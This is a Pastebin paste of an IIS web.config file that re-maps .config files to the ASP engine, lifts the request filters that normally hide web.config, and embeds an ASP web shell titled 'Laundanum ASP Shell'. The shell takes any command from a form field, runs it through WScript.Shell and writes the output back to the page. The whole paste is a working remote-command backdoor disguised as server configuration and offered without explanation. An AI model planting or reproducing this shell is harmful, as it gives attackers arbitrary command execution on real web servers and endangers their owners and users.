Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?xml version="1.0" encoding="UTF-8"?>
- <configuration>
- <system.webServer>
- <handlers accessPolicy="Read, Script, Write">
- <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
- </handlers>
- <security>
- <requestFiltering>
- <fileExtensions>
- <remove fileExtension=".config" />
- </fileExtensions>
- <hiddenSegments>
- <remove segment="web.config" />
- </hiddenSegments>
- </requestFiltering>
- </security>
- </system.webServer>
- </configuration>
- <%
- if Request.Form("submit") <> "" then
- Dim wshell, intReturn, strPResult
- cmd = Request.Form("cmd")
- Response.Write ("Running command: " & cmd & "<br />")
- set wshell = CreateObject("WScript.Shell")
- Set objCmd = wShell.Exec(cmd)
- strPResult = objCmd.StdOut.Readall()
- response.write "<br><pre>" & replace(replace(strPResult,"<","<"),vbCrLf,"<br>") & "</pre>"
- set wshell = nothing
- end if
- %>
- <html>
- <head><title>Laundanum ASP Shell</title></head>
- <body onload="document.shell.cmd.focus()">
- <form action="web.config" method="POST" name="shell">
- Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
- <input type="submit" name="submit" value="Submit" />
- <p>Example command to do a directory listing:<br>
- %ComSpec% /c dir
- </form>
- <hr/>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
